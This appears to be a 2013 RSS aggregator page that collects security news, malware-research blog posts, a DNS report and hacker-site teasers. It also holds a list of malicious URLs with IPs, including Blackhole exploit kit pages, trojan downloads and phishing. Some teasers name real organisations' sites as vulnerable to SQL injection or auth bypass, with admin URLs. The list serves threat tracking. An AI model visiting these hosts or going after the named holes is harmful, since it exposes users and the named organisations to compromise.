http://www.infosecurity-magazine.com/rss/news/ Rumors are growing that the next Xbox, the Xbox 720 (aka Durango), will require that the motion-sensing Kinect (currently optional on the Xbox 360) be connected for the games console to function.

==> Presidential cybersecurity executive order expected Wednesday

http://www.infosecurity-magazine.com/rss/news/ President Obama is expected to issue an executive order to replace last year's failed CISPA on Wednesday, the same day that Rogers and Ruppersberger have said they will re-introduce the original CISPA.

==> Banking trojans change up their tactics

http://www.infosecurity-magazine.com/rss/news/ Two high-profile banking trojans, Tinba and Tilon, are manifesting simultaneous changes designed to avoid detection by financial security systems. Instead of tampering with an online banking session in real time, both are now serving fake web pages to capture credentials, a distinctly remedial approach, researchers say.

==> Mega receives seven 'low-level' vulnerabilities in €10K crypto challenge

http://www.infosecurity-magazine.com/rss/news/ Mega, the recently launched cloud storage service from MegaUpload creator Kim Dotcom, has released the interim results of its crypto-challenge, in which it offers a €10,000 reward to anyone who can break the service's open-source encryption. So far, seven low-level vulnerabilities have been found, none of them critical, as Mega was at pains to point out.

==> Mobile Malcoders Pay to (Google) Play

http://www.krebsonsecurity.com/feed/ An explosion in malware targeting Android users is being fueled in part by a budding market for mobile malcode creation kits, as well as a bustling market for hijacked or fraudulent developer accounts at Google Play that can be used to disguise malware as legitimate apps for sale.

==> Oracle Issues Emergency Java Update

http://www.krebsonsecurity.com/feed/ Oracle today pushed out the third update in less than a month to fix critical vulnerabilities in its Java software. This patch plugs a dangerous security hole in Java that attackers have been exploiting to break into systems.

==> KrebsOnSecurity Wins Awards

http://www.krebsonsecurity.com/feed/ I recently returned from San Francisco, which last week hosted the annual RSA Security conference. I had the pleasure of moderating a panel discussion on Raising the Costs of Compromise with some very smart guys, and also shared a stage with several security authors who were recognized for their contributions to infosec media.

==> Evernote Forces Password Reset for 50M Users

http://www.krebsonsecurity.com/feed/ Online note-syncing service Evernote is forcing all of its 50 million users to reset their passwords after detecting suspicious activity on its network.

==> New Java 0-Day Attack Echoes Bit9 Breach

http://www.krebsonsecurity.com/feed/ Once again, attackers are leveraging a previously unknown critical security hole in Java to break into targeted computers. Interestingly, the malware and networks used by the bad guys in this latest attack match those found in the recently disclosed breach at security firm Bit9.

==> Flash Player Update Fixes Zero-Day Flaws

http://www.krebsonsecurity.com/feed/ Adobe has released an emergency update for its Flash Player software that fixes three critical vulnerabilities, two of which the company warns are actively being exploited to compromise systems. In an advisory, Adobe said two of the bugs quashed in this update (CVE-2013-0643 and CVE-2013-0648) are being used by attackers to target Firefox users. The company [...]

==> Critical Security Updates for Adobe Reader, Java

http://www.krebsonsecurity.com/feed/ Adobe and Oracle each released updates to fix critical security holes in their software. Adobe's patch plugs two zero-day holes that hackers have been using to break into computers via Adobe Reader and Acrobat. Separately, Oracle issued updates to correct at least five security issues with Java. The Java update comes amid revelations by Apple, Facebook and Twitter that employees at these organizations were hacked using exploits that attacked Java vulnerabilities on Mac and Windows machines. According to Bloomberg News, at least 40 companies were targeted in malware attacks linked to an Eastern European gang of hackers that has been trying to steal corporate secrets.

==> Bit9 Breach Began in July 2012

http://www.krebsonsecurity.com/feed/ Cyber espionage hackers who broke into security firm Bit9 initially breached the company's defenses in July 2012, according to evidence being gathered by security experts investigating the incident. Bit9 remains reluctant to name customers that were impacted by the intrusion, but the custom-made malicious software used in the attack was deployed last year in highly targeted attacks against U.S. defense contractors.

==> DDoS Attack on Bank Hid $900,000 Cyberheist

http://www.krebsonsecurity.com/feed/ A Christmas Eve cyberattack against the Web site of a regional California financial institution helped to distract bank officials from an online account takeover against one of its clients, netting thieves more than $900,000.

==> Zero-Day Flaws in Adobe Reader, Acrobat

http://www.krebsonsecurity.com/feed/ Adobe is warning that attackers are exploiting critical flaws in its PDF Reader and Acrobat software to break into vulnerable systems, and that the exploit being used in attacks evades the sandbox protection built into these products.

==> seodirect-proxy.com (2013/03/05_10:25)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: seodirect-proxy.com/adobe-update.exe, IP address: 101.99.23.176, ASN: 45903, Country: VN, Description: trojan

==> forumkianko.ru:8080 (2013/03/05_15:58)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: forumkianko.ru:8080/forum/links/column.php, IP address: 46.4.77.145, ASN: 24940, Country: DE, Description: Blackhole exploit kit 2.0

==> update90.com (2013/03/04_05:59)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: update90.com/flashplayer/pro11/2/index.php?&_mcnc&af=d0bcd763e2b79e4d675cb83b9c436ca1&of=gTPB-5-usa%20%20&p=y&al=WARNING!%20Your%20Flash%20Player%20may%20be%20out%20of%20date.%20Please%20click%20to%20continue, IP address: 50.17.107.125, ASN: 14618, Country: US, Description: Fake Flash page

==> install.update90.com (2013/03/04_05:59)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: install.update90.com/get/click/a6f26911/?filename=Update&sid=gTPB-5-usa%20&uid=d0bcd763e2b79e4d675cb83b9c436ca1, IP address: 192.34.58.151, ASN: 46652, Country: US, Description: Win32.Adware

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/wordpress/wp-content/themes/twentyeleven/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/wordpress/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> activeadultproperties.com (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: activeadultproperties.com/, IP address: 173.201.231.194, ASN: 26496, Country: US, Description: Loads Blackhole Exploit

==> keqkkauyyrd.myfw.us (2013/03/04_06:01)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: keqkkauyyrd.myfw.us/ad/feed.php, IP address: 67.208.74.71, ASN: 33597, Country: US, Description: Blackhole Exploit

==> forumla.ru:8080 (2013/03/04_14:51)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: forumla.ru:8080/forum/links/column.php, IP address: 50.31.1.104, ASN: 32748, Country: US, Description: Blackhole exploit kit 2.0

==> complainpaywall.net (2013/03/04_16:56)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: complainpaywall.net/closest/c93jfi2jf92ifj39ugh2jfo3g.php, IP address: 188.93.211.156, ASN: 49352, Country: RU, Description: Blackhole exploit kit 2.0

==> inanimateweaknesses.net (2013/03/04_16:56)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: inanimateweaknesses.net/closest/c93jfi2jf92ifj39ugh2jfo3g.php, IP address: 188.93.211.156, ASN: 49352, Country: RU, Description: Blackhole exploit kit 2.0

==> aaedeusa.rubbermarbles.com (2013/03/01_12:04)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: aaedeusa.rubbermarbles.com/links/excludes_leads-source-necessary.php, IP address: 63.141.249.227, ASN: 32097, Country: US, Description: Blackhole exploit kit 2.0

==> 888casino-luckystar.net (2013/03/01_12:41)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: 888casino-luckystar.net/discussing/sizes_agreed.php, IP address: 130.185.105.74, ASN: 51191, Country: DE, Description: Blackhole exploit kit 2.0

==> www.x-cite.com (2013/02/28_08:41)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: www.x-cite.com/components/.52qixq.php?receipt=796_1013817823, IP address: 85.214.26.169, ASN: 6724, Country: DE, Description: trojan inside zip file

==> berrybots.net (2013/02/27_12:46)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: berrybots.net/detects/circulation-comparatively.php, IP address: 195.88.139.78, ASN: 48323, Country: UA, Description: Blackhole exploit kit 2.0

==> s457698295.online.de (2013/02/27_12:58)

http://www.malwaredomainlist.com/hostslist/mdl.xml Host: s457698295.online.de/index.php, IP address: 82.165.64.173, ASN: 8560, Country: DE, Description: Paypal phishing

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality, but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny. [1] You still need a Google account to download the samples.

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay. There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Blackhat) buy them a drink. There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future. The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content. To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. 
Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal. Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1. The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series. Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security. Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable. More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

http://www.offensivecomputing.net/?q=node/feed This week I will be presenting on scalable, automated baremetal malware analysis at Black Hat Europe. My presentation will coincide with the release of NVMTrace, a tool that facilitates automated baremetal sample processing using inexpensive hardware and freely available technologies. More information is available at the following link: Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis If you are attending Black Hat Europe and malware analysis is a topic of interest to you, please attend my talk. If you are interested but will not be in attendance, please let me know and I will make my whitepaper and slide set available to you.

==> BHO Reversing

http://www.offensivecomputing.net/?q=node/feed For a long time now (BHOs have been supported since IE 4.0), malware writers have exploited BHO functionality to prey on IE users. Most malicious BHOs have two functions (certainly where bankers are concerned): monitoring/logging the requests sent by the browser (POST dumps, password stealing) and dynamic modification of the HTML page code (HTML code injection), used e.g. for adding extra form fields intended to obtain more TAN codes or generally some (...) Read the entire post here: BHO Reversing

==> Practical Malware Analysis - A Book Review and Curmudgeonly Rant on the State of Reverse Engineering

http://www.offensivecomputing.net/?q=node/feed Recently I was asked to review a pre-publication copy of Mike Sikorski and Andrew Honig's book Practical Malware Analysis by No Starch Press. I gave it an enthusiastic review, and I strongly believe this will become the de facto text for learning malware analysis in the future. This is a review of that book, and a short rant on reverse engineering. Before getting into Practical Malware Analysis, I hope you will indulge me in a rant about other books on the reverse engineering topic: they are not pretty. If you've taken one of my classes I recommend a few books for learning reversing, but climbing the steep mountain of prerequisite material before you can attempt to be somewhat proficient is daunting. Specifically, the books I recommended were based off of each individual author's own personal style of reverse engineering with the tools that were available at the time. The field has gotten much more accessible thanks to the awesome tools that are out there from companies like Hex-Rays and Zynamics. Practical Malware Analysis does a good job of tying together the methods of modern malware analysis. While most of the previous texts have done a good job of presenting the state of the art at their time, PMA overviews many of the tools that are in use in the modern day. Part 1 starts off with the basic static techniques, how to set up a virtual environment, and dynamic analysis. These initial steps are the basis for any good reversing environment. What is nice is that these topics aren't dwelled on for an entire book. Part 2 goes over the relationships of the Intel architecture, IDA Pro, modern compilers, and the Windows operating system to reverse engineering. Having an understanding of this as it applies to the reversing process is extremely important. Outside of implementing a compiler, learning the fundamentals of the architecture is the most important skill a reverser can have for understanding the field. The difference between an adequate reverser and a great reverser lies in the understanding of how the system interactions work. The rest of the book is focused on the advanced topics of dynamic analysis. Part 5 deals with all the ways that malware authors can make your life miserable, from anti-disassembly to packers. Part 6, Special Topics, talks about shellcode analysis, C++ specifics, and the ever-looming threat of 64-bit malware. I suspect that there will be a second edition once 64-bit malware comes into vogue. Overall the book is excellent for those that are new to this field. Experts love to curmudgeonly talk about how nothing is new anymore, everything sucks, and pine for the good old days of reverse engineering with some wire-wrap, a lead pencil, a 9-volt Duracell, and a single LED. If you consider yourself one of these people, reading this book is going to feel a lot like wearing someone else's underwear. If, on the other hand, you read it and put aside your natural skepticism of all things new, you might learn something. I really do like this book. Edit 3/4/2012: I have no financial interest in the book. The only thing I received was a reviewer's copy. This was not sponsored or paid for in any way by the authors or publishers. Edit 2/13/2013: There has been a translation of this review into Serbo-Croatian by Joanna Milutinovich.

==> CAST Slides: Hunting malware with Volatility v2.0

http://www.offensivecomputing.net/?q=node/feed Last week I gave a talk at the CAST forum about hunting malware with Volatility 2.0. In 40 slides I introduce the main features of this powerful forensic framework. All memory dumps discussed are snapshots from machines infected with modern malware and rootkits. http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf

==> Introduction to IDA Python

http://www.offensivecomputing.net/?q=node/feed The Introduction to IDA Python document by Ero Carrera is one of the better documents on scripting the IDA Pro platform available. After talking with Ero directly, I have received permission to host the PDF directly on Offensive Computing to make it available long-term. Enjoy. Introduction to IDA Python by Ero Carrera. Danny

==> CSI:Internet series - Spyeye detection with Volatility v2 and kernel debugging the TDL4 rootkit

http://www.offensivecomputing.net/?q=node/feed Just in case you missed my forensic analysis contributions for the CSI:Internet series on h-online.com... CSI:Internet - A trip into RAM http://www.h-online.com/security/features/CSI-Internet-A-trip-into-RAM-1339479.html CSI:Internet - Open heart surgery http://www.h-online.com/security/features/CSI-Internet-Open-heart-surgery-1350313.html Enjoy!

==> Branch tracing and LBR access from user-mode in Windows.

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Using pre-paged in virtual memory as an anti-dumping and anti-debugging mechanism

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Context switches and cycle time counting as anti-debug mechanism

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> RTL_USER_PROCESS_PARAMETERS anti-debug

http://www.openrce.org/rss/feeds/blogs written by everdox.

==> Wow64-Specific Anti-Debug Trick

http://www.openrce.org/rss/feeds/blogs written by waleedassar.

==> darkc0de.net

http://www.robtex.com/dns/darkc0de.net.rss Summary
---
Darkc0de.net is a domain controlled by two domain name servers at dsredirection.com. Both are on the same IP network. Incoming mail for darkc0de.net is handled by one mail server at isp-inter.net. Darkc0de.net has one IP number (204.13.162.116). Somalital.com, sx40.com, okf.no, coolsmiles.net, wripe.com and at least 80 other hosts point to the same IP and also share both name servers and mail servers. Moissanitebracelet.com, mistlubrication.com, aislebridal.com, scheda.net, tubeya.com and at least 75 other hosts point to the same IP and also share name servers. Darmowe-cipeczki.net, goaliecamps.net, flayproxy.com, mazda323performance.com, vipknan.com and at least 70 other hosts point to the same IP and also share mail servers. Diariopueblasinfronteras.com, textbug.com, mega-specials.com, ipopkreyol.com, fusiombd.com and at least 65 other hosts point to the same IP. Asf.nl, manhours.net, bitadvertiser.com, jaluzitamir.com, detgujarat.com and at least 117 other hosts share both name servers and mail servers with this domain. Wineandlife.com, 5starbombayhotels.com, desksforcomputers.com, timebandits.com, cisanosulneva.com and at least 195 other hosts share name servers with this domain. Searchounds.com, dicsoinary.com, gamesage.com, barstoolssupercenter.com, southendbathrooms.com and at least 114 other hosts share mail servers with this domain. Isp-inter.net and mapleleafmail.com share mail servers under another name with this domain. Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. Darkc0de.net is hosted on a server in Los Angeles, CA, United States. It has four inlinks.
Which servers does darkc0de.net use?
Darkc0de.net uses the primary name server ns1.dsredirection.com, the two name servers ns1 and ns2.dsredirection.com together (hereafter referred to as "name server group 1"), the IPv4 number 204.13.162.116 only, and the primary mail server mx.isp-inter.net.
Related to darkc0de.net
The primary name server ns1.dsredirection.com only: all of the several thousand domains that use the primary name server ns1.dsredirection.com use name server group 1 (example: eb2byellowpages.net, thinksexist.com and countryheart.com). Worth noting is that one in five of the domains that use name server group 1 use the primary name server ns1.dsredirection.com.
The IPv4 number 204.13.162.116 only: there are several thousand domains that only use the IPv4 number 204.13.162.116.
* Three quarters of those use only the mail server mx.isp-inter.net (example: root.sheffieldnews.com, flive.com and www.aldultporn.com). Worth noting is that a third of the domains that only use the mail server mx.isp-inter.net use only the IPv4 number 204.13.162.116.
* Three quarters of them use the primary mail server mx.isp-inter.net (example: mail.ggcrcbypass.com, ww.masajbucuresti.com.htmlfacebook.com and underunder.com).
* More than one in seven of them start with "www" (example: www.162by.com, www.salmanimage.com and www.mp4mobilemovie.net).
The two name servers ns1 and ns2.dsredirection.com together: there are millions of domains that use name server group 1.
* Three quarters of those are under the TLD "com" (example: runway404.com, diversionesjunior.com and shayjohnsonatl.com).
* A third of them use only the IPv4 number 208.73.210.27 (example: top-site-2004.info, weaversceramic.com and aby-escotre-vip-paris.com).
* A third of them point only to the IP number 208.73.210.27 (example: floridadivorcelaw.net, indywast.com and newarktrolly.com).
The mail server mx.isp-inter.net only: there are several thousand domains that only use the mail server mx.isp-inter.net.
* A third of those use only the IPv4 number 204.13.160.107 (example: indiaoiltenders.com, wwwpa.net and www.letmewatachthis.com).
* A third of them point only to the IP number 204.13.162.116 (example: indiabulles.com, mail.www.bo and obraspublicaspr.com).
* A third of them use only the IPv4 number 204.13.162.116 (example: mavimex.com, filter.100topcamsites.com and eurowrestlers.com). Worth noting is that three quarters of the domains that only use the IPv4 number 204.13.162.116 use only the mail server mx.isp-inter.net.
Reputation is not yet known. It is not listed in any blacklists.
Domain Name Reputation:
Source | Result
WOT | not yet known
BLACKLIST | not listed in any blacklists
Result
--
The following pages contain combined information gathered by searching several sources.
Source | Date | Information
 | Mar 6, 2013 6:02:59 PM | Visible DNS Information
rbls.org | Mar 6, 2013 6:02:56 PM | Blacklistings
Alexa | Mar 6, 2013 6:02:56 PM | Description, ranking and other stats
WOT | Mar 4, 2013 6:02:34 PM | Reputation
 | Jan 31, 2013 2:27:01 PM | Whois information
Total score 10/50, normalized to 1.5 out of 5 based on 5 tests (1.5/5)
Check | Result
NS on different IP networks | NO
NS delegation consistent with zone | YES
Listed in DMOZ | NO
Listed in Alexa top 100000 | NO
Good WOT rating | NO
Indexed in Google | -
More pages on the Internet describing the domain: Google Safe Browsing | McAfee SiteAdvisor | Norton Safe Web | AVG | Web of Trust | rbls.org | Alexa | DNS Tree | Whois info | Domain Info API | mnw | More...
DNS Records
-------
Base | Record | Pref | Name | IP-number | Reverse | Route | Autonomous System
darkc0de.net | a | | | 204.13.162.116 (Los Angeles, CA, United States) | (none) | 204.13.160.0/22 VeriSign Customer Route | AS33626 OVERSEE
 | ns | | ns1.dsredirection.com | 204.13.160.143 (Los Angeles, CA, United States) | | |
 | ns | | ns2.dsredirection.com | 204.13.161.145 (Los Angeles, CA, United States) | | |
 | mx | 0 | mx.isp-inter.net | 199.168.90.60 (Alexandria, VA, United States) | sie-spool2.deteque.com | 199.168.88.0/22 LLNW customer route | AS54054
com net dsredirection.com isp-inter.net deteque.com
Graph - darkc0de.net
Shared
--
IP numbers of host (1 item) * 204.13.162.116 PTRs of IP numbers (1 item) * host204-13-162-116.oversee.net Host names sharing IP with A records (99 items) * *.backpagr.com * *.bollywoodparadaise.com * *.clip.vn.com * *.hostmaster.freefootballstreaming.info * *.idshotel.com * *.jashnvare.net * *.lvwrinklerescue.com * *.mafa.com * *.ns5.root.root.ns4.tamarer.com * *.redesigns.com * *.root.ns6.root.ns1.ns2.bitagede.com * *.ropsy.com * *.www.flash108.com * *.www.indiansexstorie.com * 1.creativegift.com * 10.mtngprs.net * aislebridal.com * amosu.net * banatdrem.com * barrcudanetworks.com * biologybiozone.com * caricare.net * cenimelody.com * coolsmiles.net * coqporn.com * darmowe-cipeczki.net * diariopueblasinfronteras.com * dinotubes.com * eurowrestlers.com * fanktube.com * filter.100topcamsites.com * flayproxy.com * flive.com * freebloggertemplate.com * fusiombd.com * gkdns.com.realymodels.net * glb.onec0re.com * goaliecamps.net * got-casino.com * gov.mm.org * greenpolice.net * hangtep.com * hookerdorm.com * indiabulles.com * ipopkreyol.com * kaiclick.com * kannadawap.com * lacaravelle1.com * mail.camperplaatsen.net * mail.cat4.com * mail.chinesenic.net * mail.ggcrcbypass.com * mail.powernutrition4you.com * mail.www.bo * mavimex.com * mazda323performance.com * mega-specials.com * mistlubrication.com * moissanitebracelet.com * mx2.webdesin.com * ns1.redifmile.com * obraspublicaspr.com * okf.no * pop.lesuperbe.com * 
robtex.com252fwww.malaiyalamsex.com * root.sheffieldnews.com * scheda.net * seks-filmi.com * somalital.com * sx40.com * tamil-bleep.com * textbug.com * tubeya.com * twinsync.com * underunder.com * unilibertadores.com * vipknan.com * vn.thepirateapp.net * wayyn.com * worldamateurvideos.com * wripe.com * ww.masajbucuresti.com.htmlfacebook.com * www.1234567890.co * www.162by.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.aradz.com * www.campwyoming.com * www.debonairbblog.com * www.gooyanews.com * www.hvooh.com * www.movie28.com * www.mp4mobilemovie.net * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.xxfshow.com * zds.com Name servers used by this domain (2 items) * ns1.dsredirection.com * ns2.dsredirection.com Domains sharing name servers (215 items) * 1.creativegift.com * 10.mtngprs.net * 1982.me * 5starbombayhotels.com * aby-escotre-vip-paris.com * africanairport.com * aislebridal.com * alohamovies.com * amosu.net * aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com * asf.nl * banatdrem.com * barbersbulldogs.com * barensandnobel.com * barrcudanetworks.com * barstoolssupercenter.com * baylisenterprises.com * benift.com * bioghraphys.com * biologybiozone.com * bitadvertiser.com * bradleyhandbags.com * byukp.org * caribeaquasystems.com * caricare.net * cashgang.com * cenimelody.com * chinaiu.com * cisanosulneva.com * concuersonacionalalianza.org * consumercallulartv.com * content4smart.com * continteal.com * coolsmiles.net * coqporn.com * countryheart.com * cyberdump.com * dairyjobs.net * darmowe-cipeczki.net * desadmide.com * desksforcomputers.com * detgujarat.com * diariopueblasinfronteras.com * dicsoinary.com * dinotubes.com * disarms.org * diskidea.com * diversionesjunior.com * dns2.thermadorsevice.com * dot-edu.org * e-autoshop.com * e-marketing411.com * east153.com * easter1.com * eb2byellowpages.net * eldelman.com * ertly.com * eurobegrenzer.com * eurowrestlers.com * fanktube.com * filter.100topcamsites.com * 

==> Say Cyber Again.

http://www.spacerogue.net/wordpress/?feed=rss2 I don’t think this will stay on YouTube very long. I got an instant DMCA takedown notice as soon as it was uploaded. I filed a dispute but we all know how those go, so watch it now while you can.

==> Then They Came For Me…

http://www.spacerogue.net/wordpress/?feed=rss2 First they came for Jackson, and I didn’t speak out because I didn’t play D&D. Then they came for Neidorf, and I didn’t speak out because I trusted the phone company. Then they came for Mitnick, and I didn’t speak out because I thought the government was telling the truth. Then they came for Watt, [...]

==> Anatomy of Hype

http://www.spacerogue.net/wordpress/?feed=rss2 Let’s see if I can break this down chronologically. On July 12, 2012 a third party marketing firm hired by Verizon had a large database of Verizon user information ‘copied’. Verizon claims the incident was reported to authorities but no breach actually happened. This statement from Verizon raises several questions. 1. Why did a 3rd [...]

==> Book Review: This Machine Kills Secrets

http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets. By: Andy Greenberg. Penguin Group 2012. ISBN 978-1-101-59358-5. *Page references have been taken from the electronic iPad version. I’ll admit I haven’t finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasn’t even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just won’t die and every time it comes around again I just get angrier. The problem is I don’t think the story is actually true, which wouldn’t be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> BSNL- Dotsoft (Admin) Auth Bypass Vulnerability, calcuttatelephones.com Database Disclosure

http://www.thehackerslibrary.com/?feed=rss Profile: Dotsoft is an in-house developed software, integrating the Commercial Activities, Telecom Billing & Accounting, FRS and Directory Enquiry. It has been implemented in 171 SSAs (Districts) across the country. Company URL: http://dotsoft.bsnl.co.in/ Admin url: http://dotsoft.bsnl.co.in/helpdesk/admin.asp Demo: http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream Calcuttatelephones.com Database Disclosure, Directory Listing. http://www.calcuttatelephones.com Demo: http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream Database containing 2600 plus records. phpMyAdmin SQL Dump version 2.5.7-pl1 [...]

==> Unlock Idea Net Setter – The Easiest Way

http://www.thehackerslibrary.com/?feed=rss In India IDEA launched its Netsetter USB 3G modem for internet access. You can access up to 21mbps via this USB Net setter. As I was watching people here fool others in the name of unlocking to earn money, I thought why not educate our members. Netsetter is using a Hawai [...]

==> IGNOU website+Few other Sites – SQL Injection, Weak Authentication Vulnerabilities

http://www.thehackerslibrary.com/?feed=rss IGNOU currently serves approximately 3.8 million students in India and 40 countries abroad in twenty one schools and a network of 59 regional centres, 7 sub-regional centres, 2600 study centres, and 52 overseas centres. IGNOU website is somehow vulnerable to SQL Injection & Weak Authentication Vulnerability. Some modules of site www.ignou.ac.in have weak authentication, [...]

==> vsworld.com – SQL Injection Vulnerability

http://www.thehackerslibrary.com/?feed=rss vsworld – SQL Injection Vulnerability Profile: Developing solutions for areas as diverse as technology, trading, power, travel, education and retail. In addition, regularly called upon to cater to the requirements of prestigious Government Bodies. Various prestigious clients are in Client list. Vendor URL: http://www.vsworld.com/index.php Vulnerability Type: SQL Injection Vulnerable URL: http://www.vsworld.com/index.php/en/admin-login.html & http://www.vsworld.com/index.php =>VSM Login [...]

==> Sandeep’s Commentry on the Linux Kernel – Part 1

http://www.thehackerslibrary.com/?feed=rss I will provide a hands-on guide on dissecting and learning the Linux kernel. But I am busy with work and so forth and I may not be able to post in a regular way. I however will not spoon feed and I will just be providing general guidelines. Also I will be covering the Linux [...]

==> Bom Sabado – A new orkut worm

http://www.thehackerslibrary.com/?feed=rss Bom Sabado means in English "happy Saturday". It is a worm spread by some Brazilian group. In this article I’m going to share its working process and how to prevent it; hope you enjoy the article. In this attack, you get some scrap saying "bom sabado" and your account hangs, you joined [...]

==> Orkut Bug: Community Hacking

http://www.thehackerslibrary.com/?feed=rss There was a bug a few days ago in the new orkut. Some big communities like Stanford were hacked back then. So here is the post on how it was hacked. The attacker transfers a dummy community to himself. Then he starts capturing what data proceeds during the transfer. For this the attacker uses a Firefox addon called [...]

==> SSL Hijacking

http://www.thehackerslibrary.com/?feed=rss It discusses the weakness in the SSL certificate signing request which gets exploited for making fake certificates. Finally, the article shows how to run the SSLStrip tool on Windows and hijack the SSL successfully. What is SSLStrip The SSLStrip works by watching http traffic, then by acting as a proxy when a user attempts to [...]

==> Sikkim Manipal University portal can be hacked via SQL Injection

